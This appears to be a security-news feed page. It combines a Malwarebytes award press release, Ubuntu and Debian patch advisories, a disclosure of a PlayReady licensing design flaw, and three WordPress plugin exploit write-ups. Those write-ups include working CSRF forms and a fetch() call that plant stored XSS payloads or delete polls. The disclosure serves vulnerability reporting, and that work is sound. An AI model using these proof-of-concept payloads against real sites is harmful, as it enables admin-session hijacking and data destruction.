Malwarebytes has been awarded the Parent Tested Parent Approved Seal of Approval for product excellence.

We’re delighted to say Malwarebytes has been awarded the Parent Tested Parent Approved Seal of Approval for product excellence. 

The Seal of Approval is given to products that have earned the trust of families, and serves as a quick and reliable indicator of quality and dependability for parents and caregivers. 

Malwarebytes Plus, our Premium Security + Privacy VPN bundle, was tested and reviewed by a group of parents, and scored high in areas of ease of installation and use, value for money, and effectiveness.  

Reviewers noted that Malwarebytes Plus not only enhanced their device security, but also provided them with peace of mind, making them feel more confident about their family’s online safety. 

100% of the reviewers said they found it “very easy” to set up Malwarebytes on their device, with 94% saying they would continue using Malwarebytes after the testing period. 

They also praised the user friendliness of the program:

> “Malwarebytes Plus is hands down the best antivirus system on the market. You don’t have to be a rocket scientist to run it – it does all the work for you!” 

94% said Malwarebytes was “very easy” to use for protecting their privacy online. One reviewer highlighted the peace of mind it offers: “I think every parent would feel safe about their children’s computer use after installing this software.” 

Sharon Vinderine, Founder and CEO of Parent Tested Parent Approved said:

> “The Parent Tested Parent Approved Seal of Approval is much more than an award; it’s the at-a-glance symbol of trust and reliability for millions of families.” 

Protect your—and your family’s—devices by using Malwarebytes.

 Malwarebytes awarded Parent Tested Parent Approved Seal of Approval 

Ubuntu Security Notice 6954-1 - Markus Frank and Fiona Ebner discovered that QEMU did not properly handle certain memory operations, leading to a NULL pointer dereference. An authenticated user could potentially use this issue to cause a denial of service. Xiao Lei discovered that QEMU did not properly handle certain memory operations when specific features were enabled, which could lead to a stack overflow. An attacker could potentially use this issue to leak sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6954-1  
August 13, 2024

qemu vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in QEMU.

Software Description:  
- qemu: Machine emulator and virtualizer

Details:

Markus Frank and Fiona Ebner discovered that QEMU did not properly  
handle certain memory operations, leading to a NULL pointer dereference.  
An authenticated user could potentially use this issue to cause a denial  
of service. (CVE-2023-6683)

Xiao Lei discovered that QEMU did not properly handle certain memory  
operations when specific features were enabled, which could lead to a  
stack overflow. An attacker could potentially use this issue to leak  
sensitive information. (CVE-2023-6693)

It was discovered that QEMU had an integer underflow vulnerability in  
the TI command, which would result in a buffer overflow. An attacker  
could potentially use this issue to cause a denial of service.  
(CVE-2024-24474)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
   qemu-system                     1:6.2+dfsg-2ubuntu6.22  
   qemu-system-arm                 1:6.2+dfsg-2ubuntu6.22  
   qemu-system-mips                1:6.2+dfsg-2ubuntu6.22  
   qemu-system-misc                1:6.2+dfsg-2ubuntu6.22  
   qemu-system-ppc                 1:6.2+dfsg-2ubuntu6.22  
   qemu-system-s390x               1:6.2+dfsg-2ubuntu6.22  
   qemu-system-sparc               1:6.2+dfsg-2ubuntu6.22  
   qemu-system-x86-xen             1:6.2+dfsg-2ubuntu6.22

After a standard system update you need to restart all QEMU virtual  
machines to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6954-1  
   CVE-2023-6683, CVE-2023-6693, CVE-2024-24474

Package Information:  
   https://launchpad.net/ubuntu/+source/qemu/1:6.2+dfsg-2ubuntu6.22

Ubuntu Security Notice USN-6954-1

WordPress MapFig Studio plugin versions 0.2.1 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

    # Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/# Version: <= 0.2.1# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF check in some places, and is missingsanitisation as well as escaping, which could allow attackers to makelogged in admin add Stored XSS payloads via a CSRF attackProof of ConceptHave a logged in admin open a page containing:<html>  <body>    <form action="http://example.com/wp-admin/admin.php?page=studio_settings"method="POST">      <input type="hidden" name="studio_apikey"value=""><script>alert(1)</script>" />      <input type="hidden" name="studio_url"value=""><script>alert(1)</script>" />      <input type="hidden" name="save" value="Save!" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html>Reference:https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/

WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting

Debian Linux Security Advisory 5743-2 - Multiple cross-site scripting vulnerabilities were discovered in RoundCube webmail.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5743-2                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 13, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : roundcube  
CVE ID         : CVE-2024-42008 CVE-2024-42009 CVE-2024-42010

Multiple cross-site scripting vulnerabilities were discovered in  
RoundCube webmail.

For the oldstable distribution (bullseye), these problems have been fixed in  
version 1.4.15+dfsg.1-1+deb11u4.

For the stable distribution (bookworm), these problems have already been  
addressed in DSA-5743-1. The initial fixes introduced a regression in  
print previews, which has now been addressed in 1.6.5+dfsg-1+deb12u4.

We recommend that you upgrade your roundcube packages.

For the detailed security status of roundcube please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/roundcube

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAma7AK0ACgkQEMKTtsN8  
TjaCLhAAj9ooFCqkks/zX1SUM0VpGOKCUwkUiAotKggBJnAOhCAeLJ++YXJeFpTx  
h8Muye2jgC1BjpmA0HsdjtHDUOEWL73n2eG3obHEQG+WytJISfz7LyoFxJPBDZUA  
bKs0+MMg8wA8VJJWZ8PIoYm4DaTjgVkiaCQQxJhRfZw/LNGFYN9Y9yEL2XrncR8I  
fZoug/Iyl4+qC8zr2iYWHFs2TMZXMbYNLFRDY06J5XYFuQ0QPa7KbkN8UvXRNeK4  
DOTrkQKeauJHmWl9gfJ9U8w+TYo8mYwU38NoEm/1x0lhqMk/A9KMyROJPuZmCD+R  
QWMzULFdqLduvp+iMr0MSGeLnvzuX6AXME8K7JnMiELOmXWCVNAlTNFnmKBftUOZ  
mh8MKlNkaGyNO2G9PGIeCNURGwI8NIN0UABZN9h289mn0QM195MuLZN/OZtUBH2s  
FU9VAXg2Lw/WKaVj9gndSAv3aN68YN8efuXeTVnPTQaSdHsnBR0fT0yqZd1BWMFy  
mq6oYxZGXfRgkb6/KwB/oY3dutXxtUj0GKdC7cQIG2oMyEcFN3Q5yG8oPHZHzgwJ  
UYWwA46Jwhy1kRcYmukL+dGtwWsSM7yW6zjV8ifMxJ4zGMJjmMkPSWdKzG/otn7K  
oVu/AMHnfCRY/RmXbg1uyuCmjamDZce1fPlDTuvHW+m0AHGvYqU=  
=Y9uW  
-----END PGP SIGNATURE-----

Debian Security Advisory 5743-2

There is an architectural and design issue in Microsoft's PlayReady which can be successfully exploited to gain access to license server by arbitrary clients. The problem has its origin in flat certificate namespace / reliance on a single root key in PlayReady along with no authentication at the license server end by default (deemed as no bug by Microsoft).

Hello All,

There is an architectural / design issue of PlayReady, which can be  
successfully exploited to gain access to license server by arbitrary  
clients. The problem has its origin in flat certificate namespace /  
reliance on a single root key in PlayReady along no auth at license  
server end by default (deemed as no bug by Microsoft).

PlayReady client certificates encountered in Windows 10 / 11 and  
CANAL+ STB device environments share a common feature. They are all  
digitally signed by the so called WMRMECC256 Key identified by the  
following public component:

    C8 B6 AF 16 EE 94 1A AD AA 53 89 B4 AF 2C 10 E3  
    56 BE 42 AF 17 5E F3 FA CE 93 25 4E 7B 0B 3D 9B  
    98 2B 27 B5 CB 23 41 32 6E 56 AA 85 7D BF D5 C6  
    34 CE 2C F9 EA 74 FC A8 F2 AF 59 57 EF EE A5 62

Such an approach implicates the following:  
- all PlayReady license servers deployed across different content  
providers need to embed private key of WMRMECC256 Key for client  
identity verification purposes. Compromise of one provider can  
potentially impact other providers too,  
- client identities originating from different environments are to be  
successfully validated by PlayReady license server as long as the  
client identity certificate chain is signed by WMRMECC256 Key.

We exploited the above flat certificate namespace / reliance on a  
single root key in PlayReady in the context of CANAL+ environment.

On Aug 12, 2024, the compromised STB certificate used by us to  
demonstrate the possibility of a massive piracy in CANAL+ environment  
has been finally revoked.

Compromised device certificate revocation hasn't addressed the core of  
the issue though (no client auth at PlayReady license server end). It  
took us less than an hour to change the code of our POC (PlayReady  
Toolkit) in order to make it work again, successfully obtain licenses  
for content and download arbitrary movies from CANAL+ VOD library, all  
regardless of the certificate revocation.

We imported the identity file generated for Windows 10 PlayReady  
client to it (some arbitrary identity from May 2024) along private  
signing and encryption keys corresponding to it and obtained through  
attacks #3 and #4 (complete client identity compromise).

The end result was a fully functional POC and Windows PlayReady client  
working in what one would assume to be an isolated PlayReady  
environment of CANAL+ set-top-boxes. Microsoft PlayReady license  
server successfully accepted and processed identity certificate chain  
with obfuscated keys and leaf certs specific to Windows environment.

Such an operation of PlayReady license server makes any certificate  
revocations to be rather irrelevant (vide hundreds of millions of  
identities associated with Windows PlayReady clients).

Thank you.

Best Regards,  
Adam Gowdiak

----------------------------------  
Security Explorations -  
AG Security Research Lab  
https://security-explorations.com  
----------------------------------

Microsoft PlayReady Design Issue

Ubuntu Security Notice 6950-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6950-2August 13, 2024linux-aws-5.15, linux-gkeop-5.15, linux-ibm, linux-ibm-5.15, linux-raspivulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-ibm: Linux kernel for IBM cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-ibm-5.15: Linux kernel for IBM cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - Block layer subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - FireWire subsystem;   - GPU drivers;   - InfiniBand drivers;   - Multiple devices driver;   - EEPROM drivers;   - Network drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - 9P distributed file system;   - Network file system client;   - SMB network file system;   - Socket messages infrastructure;   - Dynamic debug library;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - NSH protocol;   - Phonet protocol;   - TIPC protocol;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;(CVE-2024-36883, CVE-2024-36940, CVE-2024-36902, CVE-2024-36975,CVE-2024-36964, CVE-2024-36938, CVE-2024-36931, CVE-2024-35848,CVE-2024-26900, CVE-2024-36967, CVE-2024-36904, CVE-2024-27398,CVE-2024-36031, CVE-2023-52585, CVE-2024-36886, CVE-2024-36937,CVE-2024-36954, CVE-2024-36916, CVE-2024-36905, CVE-2024-36959,CVE-2024-26980, CVE-2024-26936, CVE-2024-36928, CVE-2024-36889,CVE-2024-36929, CVE-2024-36933, CVE-2024-27399, CVE-2024-36946,CVE-2024-36906, CVE-2024-36965, CVE-2024-36957, CVE-2024-36941,CVE-2024-36897, CVE-2024-36952, CVE-2024-36947, CVE-2024-36950,CVE-2024-36880, CVE-2024-36017, CVE-2023-52882, CVE-2024-36969,CVE-2024-38600, CVE-2024-36955, CVE-2024-36960, CVE-2024-27401,CVE-2024-36919, CVE-2024-36934, CVE-2024-35947, CVE-2024-36953,CVE-2024-36944, CVE-2024-36939)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-5.15.0-1060-ibm     5.15.0-1060.63   linux-image-5.15.0-1060-raspi   5.15.0-1060.63   linux-image-ibm                 5.15.0.1060.56   linux-image-raspi               5.15.0.1060.58   linux-image-raspi-nolpae        5.15.0.1060.58Ubuntu 20.04 LTS   linux-image-5.15.0-1050-gkeop   5.15.0-1050.57~20.04.1   linux-image-5.15.0-1060-ibm     5.15.0-1060.63~20.04.1   linux-image-5.15.0-1067-aws     5.15.0-1067.73~20.04.1   linux-image-aws                 5.15.0.1067.73~20.04.1   linux-image-gkeop-5.15          5.15.0.1050.57~20.04.1   linux-image-ibm                 5.15.0.1060.63~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6950-2   https://ubuntu.com/security/notices/USN-6950-1   CVE-2023-52585, CVE-2023-52882, CVE-2024-26900, CVE-2024-26936,   CVE-2024-26980, CVE-2024-27398, CVE-2024-27399, CVE-2024-27401,   CVE-2024-35848, CVE-2024-35947, CVE-2024-36017, CVE-2024-36031,   CVE-2024-36880, CVE-2024-36883, CVE-2024-36886, CVE-2024-36889,   CVE-2024-36897, CVE-2024-36902, CVE-2024-36904, CVE-2024-36905,   CVE-2024-36906, CVE-2024-36916, CVE-2024-36919, CVE-2024-36928,   CVE-2024-36929, CVE-2024-36931, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36937, CVE-2024-36938, CVE-2024-36939, CVE-2024-36940,   CVE-2024-36941, CVE-2024-36944, CVE-2024-36946, CVE-2024-36947,   CVE-2024-36950, CVE-2024-36952, CVE-2024-36953, CVE-2024-36954,   CVE-2024-36955, CVE-2024-36957, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36964, CVE-2024-36965, CVE-2024-36967, CVE-2024-36969,   CVE-2024-36975, CVE-2024-38600Package Information:   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1060.63   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1060.63   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1067.73~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1050.57~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1060.63~20.04.1

Ubuntu Security Notice USN-6950-2

WordPress Profilepro plugin versions 1.3 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: profilepro <= 1.3 - Subscriber+ Stored Cross Site Scripting# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/profilepro/# Version: <= 1.3# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not sanitise and escape some parameters and lacks properaccess controls, which could allow users with a role as low as subscriberto perform Cross-Site Scripting attacksProof of ConceptRun the following code from the browser console from the subscriber user```fetch("../wp-admin/admin-ajax.php", {  method: "POST",  headers: {    "Accept": "*/*",    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",    "X-Requested-With": "XMLHttpRequest"  },  body:"title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89",  credentials: "include"}).then(response => {  if (!response.ok) {    throw new Error('Network response was not ok');  }  return response.text();}).then(data => console.log(data)).catch(error => console.error('Error:', error));```- As an admin, go tohttp://example.com/wp-admin/edit.php?post_type=profilepro_form- Choose the default profile, click on edit and click on add field, XSSwill pop up.Reference:https://wpscan.com/vulnerability/8faf1409-44e6-4ebf-9a68-b5f93a5295e9/

WordPress Profilepro 1.3 Cross Site Scripting

Debian Linux Security Advisory 5747-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5747-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 12, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2022-48666 CVE-2024-36484 CVE-2024-36901 CVE-2024-36938  
                 CVE-2024-39487 CVE-2024-40947 CVE-2024-41007 CVE-2024-41009  
                 CVE-2024-41012 CVE-2024-41015 CVE-2024-41017 CVE-2024-41020  
                 CVE-2024-41022 CVE-2024-41034 CVE-2024-41035 CVE-2024-41040  
                 CVE-2024-41041 CVE-2024-41044 CVE-2024-41046 CVE-2024-41049  
                 CVE-2024-41055 CVE-2024-41059 CVE-2024-41063 CVE-2024-41064  
                 CVE-2024-41065 CVE-2024-41068 CVE-2024-41070 CVE-2024-41072  
                 CVE-2024-41077 CVE-2024-41078 CVE-2024-41081 CVE-2024-41090  
                 CVE-2024-41091 CVE-2024-42101 CVE-2024-42102 CVE-2024-42104  
                 CVE-2024-42105 CVE-2024-42106 CVE-2024-42115 CVE-2024-42119  
                 CVE-2024-42120 CVE-2024-42121 CVE-2024-42124 CVE-2024-42127  
                 CVE-2024-42131 CVE-2024-42137 CVE-2024-42143 CVE-2024-42145  
                 CVE-2024-42148 CVE-2024-42152 CVE-2024-42153 CVE-2024-42154  
                 CVE-2024-42157 CVE-2024-42161 CVE-2024-42223 CVE-2024-42224  
                 CVE-2024-42229 CVE-2024-42232 CVE-2024-42236 CVE-2024-42244  
                 CVE-2024-42247

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the oldstable distribution (bullseye), these problems have been  
fixed in version 5.10.223-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAma6T9JfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QQdw/+OGGxmpgZNx20CbIlzd6l7HTabFLT1VJZY/mVVmWOIGkCjOoTuvL4VOFq  
vAs6vPMk7P1x+XMJ8kqzdn9+OO+cKYb6fFC6cFNMigIvTP/5w9V8Llsyn4liI8XB  
u1TmLiLA9tvJ5rfSzWsFWOgpL+swzYJznlL7jcaFIcLemZCQuCwmrB8ZF04F5LOa  
i0PIQwu8Cic1BmCSe6TZy8as6D7hCLPBQvqY+xW5u4/07ncVQ0tOrZn8uxndVM+h  
TSI35otncMsgDNXw1TQYgLyDwIUm79MbIm+P0THXr/HGXO14ehOHxvJ8MG8iXt/Q  
+YM1NlS5tqGPXPI+0dlGdwSx/a4XuPFOUQyxlj2B3xvhUD+rbTCtzamcjY0Qw4l3  
MhtkTjUZdOj9XdLyziAQs+bD0sKzuEu+Nkq2N6kl0Op2tRhge3aI9mwJK8v5CldY  
NiQS665HLwrjW+E4YT3hDl4ugnu66wBNDQMsR5x+gyQI9kK6vsm8xR123ugfPodL  
R4FXaf+DUQ0oVfOWJBcg6S3dmoaAwxUaJOCgHfTaqvatL8YOLvejeW1Vg+xCGGNg  
yKjdKA6bVzZjyTrqCEoSGkhx6MEiojHlwi8W+kLYNPssTkXgZ3p6dG6PPMMAxdwq  
ROJ+FccgiUApJNFmfbvU6x/pwaUzpbXP09a3bIFnNRSo40BxVio=  
=HNP3  
-----END PGP SIGNATURE-----

Debian Security Advisory 5747-1

WordPress Light Poll plugin versions 1.0.0 and below suffer from multiple cross site request forgery vulnerabilities.

    # Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF# Date: 05-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/light-poll/# Version: <=1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF checks when deleting polls, which could allowattackers to make logged in users perform such action via a CSRF attackProof of Concept<html>  <body>    <form action="http://localhost/wp-admin/admin.php">      <input type="hidden" name="page" value="lp_settings" />      <input type="hidden" name="task" value="remove" />      <input type="hidden" name="id" value="1" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html>Reference:https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF# Date: 05-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/light-poll/# Version: <=1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF checks in some places, which could allowattackers to make logged in users perform unwanted actions via CSRF attacksProof of ConceptWhere <<POLL_ID>> and <<ANSWER_ID>> are valid:https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=<<POLL_ID>>&answer_id=<<ANSWER_ID>>Reference:https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/

WordPress Light Poll 1.0.0 Cross Site Request Forgery

Ubuntu Security Notice 6957-1 - Benedict Schlüter, Supraja Sridhara, Andrin Bertschi, and Shweta Shinde discovered that an untrusted hypervisor could inject malicious #VC interrupts and compromise the security guarantees of AMD SEV-SNP. This flaw is known as WeSee. A local attacker in control of the hypervisor could use this to expose sensitive information or possibly execute arbitrary code in the trusted execution environment. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6957-1August 13, 2024linux-oracle-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:Benedict Schlüter, Supraja Sridhara, Andrin Bertschi, and Shweta Shindediscovered that an untrusted hypervisor could inject malicious #VCinterrupts and compromise the security guarantees of AMD SEV-SNP. This flawis known as WeSee. A local attacker in control of the hypervisor could usethis to expose sensitive information or possibly execute arbitrary code inthe trusted execution environment. (CVE-2024-25742)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - Block layer subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - FireWire subsystem;   - GPU drivers;   - InfiniBand drivers;   - Multiple devices driver;   - EEPROM drivers;   - Network drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - TTY drivers;   - 9P distributed file system;   - Network file system client;   - SMB network file system;   - Socket messages infrastructure;   - Dynamic debug library;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - Netfilter;   - NSH protocol;   - Phonet protocol;   - TIPC protocol;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;(CVE-2024-36947, CVE-2024-36919, CVE-2024-36929, CVE-2024-36955,CVE-2023-52585, CVE-2024-36931, CVE-2024-27399, CVE-2024-36957,CVE-2024-26980, CVE-2024-27398, CVE-2024-36902, CVE-2024-36928,CVE-2024-36960, CVE-2024-36904, CVE-2024-27017, CVE-2024-36959,CVE-2024-36880, CVE-2024-26936, CVE-2024-36975, CVE-2023-52882,CVE-2024-35848, CVE-2024-36886, CVE-2024-36889, CVE-2024-27401,CVE-2024-36906, CVE-2024-36937, CVE-2024-36016, CVE-2024-36964,CVE-2024-36933, CVE-2024-36031, CVE-2024-36969, CVE-2024-36954,CVE-2024-26900, CVE-2024-26952, CVE-2024-36017, CVE-2024-35947,CVE-2024-36965, CVE-2023-52752, CVE-2024-36905, CVE-2024-36938,CVE-2024-36952, CVE-2024-36940, CVE-2024-36916, CVE-2024-38600,CVE-2024-36946, CVE-2024-36953, CVE-2024-36967, CVE-2024-26886,CVE-2024-36934, CVE-2024-36950, CVE-2024-36941, CVE-2024-36883,CVE-2024-36944, CVE-2024-36939, CVE-2024-36897)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.15.0-1065-oracle  5.15.0-1065.71~20.04.1   linux-image-oracle              5.15.0.1065.71~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6957-1   CVE-2023-52585, CVE-2023-52752, CVE-2023-52882, CVE-2024-25742,   CVE-2024-26886, CVE-2024-26900, CVE-2024-26936, CVE-2024-26952,   CVE-2024-26980, CVE-2024-27017, CVE-2024-27398, CVE-2024-27399,   CVE-2024-27401, CVE-2024-35848, CVE-2024-35947, CVE-2024-36016,   CVE-2024-36017, CVE-2024-36031, CVE-2024-36880, CVE-2024-36883,   CVE-2024-36886, CVE-2024-36889, CVE-2024-36897, CVE-2024-36902,   CVE-2024-36904, CVE-2024-36905, CVE-2024-36906, CVE-2024-36916,   CVE-2024-36919, CVE-2024-36928, CVE-2024-36929, CVE-2024-36931,   CVE-2024-36933, CVE-2024-36934, CVE-2024-36937, CVE-2024-36938,   CVE-2024-36939, CVE-2024-36940, CVE-2024-36941, CVE-2024-36944,   CVE-2024-36946, CVE-2024-36947, CVE-2024-36950, CVE-2024-36952,   CVE-2024-36953, CVE-2024-36954, CVE-2024-36955, CVE-2024-36957,   CVE-2024-36959, CVE-2024-36960, CVE-2024-36964, CVE-2024-36965,   CVE-2024-36967, CVE-2024-36969, CVE-2024-36975, CVE-2024-38600Package Information:  https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1065.71~20.04.1

Latest News